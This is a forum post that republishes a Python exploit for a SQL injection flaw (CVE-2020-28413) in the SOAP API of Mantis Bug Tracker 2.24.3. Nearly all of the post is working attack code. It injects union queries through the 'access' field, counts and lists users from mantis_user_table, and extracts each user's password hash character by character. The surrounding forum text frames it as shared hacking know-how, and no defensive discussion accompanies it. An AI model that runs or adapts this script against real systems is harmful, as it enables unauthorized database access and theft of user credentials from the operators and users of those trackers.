Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Mantis Bug Tracker 2.24.3 - 'access' SQL Injection

 Share


Recommended Posts

# Exploit Title: Mantis Bug Tracker 2.24.3 - 'access' SQL Injection
# Date: 30/12/2020
# Exploit Author: EthicalHCOP
# Vendor Homepage: https://www.mantisbt.org/
# Version: 2.24.3
# CVE: CVE-2020-28413

import requests, sys, time
from lxml import etree

proxies = {
     "http": "http://127.0.0.1:8080",
     "https": "http://127.0.0.1:8080",
    }

def Hacer_Peticion(query):
    home = ""
    url = home+"/api/soap/mantisconnect.php"
    headers = {'content-type': 'text/xml',
               'SOAPAction': url+'"/mc_project_get_users"'}
    mantis_db_user = ""
    mantis_db_pass = ""
    body = """<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:man="http://futureware.biz/mantisconnect">
       <soapenv:Header/>
       <soapenv:Body>
          <man:mc_project_get_users soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
             <username xsi:type="xsd:string">"""+mantis_db_user+"""</username>
             <password xsi:type="xsd:string">"""+mantis_db_pass+"""</password>
             <project_id xsi:type="xsd:integer">0</project_id>
             <access xsi:type="xsd:string">"""+query+"""</access>
          </man:mc_project_get_users>
       </soapenv:Body>
    </soapenv:Envelope>"""
    response = requests.post(url, data=body, headers=headers, verify=False)
    #response = requests.post(url, data=body, headers=headers, proxies=proxies, verify=False)
    parser = etree.XMLParser(remove_blank_text=True)
    xml = etree.XML(response.content, parser)
    xml = etree.tostring(xml)
    return(str(xml))

def Cantidad_Usuarios_Mantis():
    query = "0 union all select concat('-',(select count(*) " \
            "from mantis_user_table),'0'),2,3,4 order by id asc limit 1"
    xml = Hacer_Peticion(query)
    txt = xml.split("integer")
    txt = txt[1].split("id")
    registros = str(str(str(txt[0])[:-2])[-2:])[:-1]
    return(registros)

def Obtener_Id(usr_pos):
    query = "0 union all select concat((SELECT id FROM mantis_user_table " \
            "order by id asc limit 0,1),'0'),2,3,4 limit "+str(usr_pos)+",1"
    xml = Hacer_Peticion(query)
    txt = xml.split("integer")
    txt = txt[1].split("id")
    id = str(str(txt[0])[:-2])[-1:]
    name = str(str(txt[1])[29:]).split("</name>")[0]
    return (id+"-"+name)

def brute_force(data):
    charts = "abcdefghijklmnopqrstuvwxyz0123456789"
    passw = ""
    id = data.split("-")[0]
    name = data.split("-")[1]
    for cp in range (1,33,1):
        for c in charts:
            print(f"\rHash: {passw}", end="")
            time.sleep(0.00001)
            sys.stdout.flush()
            query = "0 union all select (select if(substring((select binary(password) " \
                    "from mantis_user_table where id = " + str(id) + ")," + str(cp) + ",1)='" + str(c) + "','0','900000000000000000000')), 2,3,4 order by id asc limit 1"
            xml = Hacer_Peticion(query)
            txt = xml.split("integer")
            txt = txt[1].split("id")
            r_id = str(str(txt[0])[:-2])[-1:]
            if(r_id=="0"):
                passw = passw + str(c)
                break
    print(f"\r", end="")
    sys.stdout.flush()
    print(name+": "+passw)

def main():
    cantidad_users = Cantidad_Usuarios_Mantis()
    print("Cantidad usuarios en db: "+str(cantidad_users))
    print("Obteniendo Hashes...")
    for x in range(0,int(cantidad_users),1):
        brute_force(Obtener_Id(x))

if __name__ == "__main__":
    main()
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...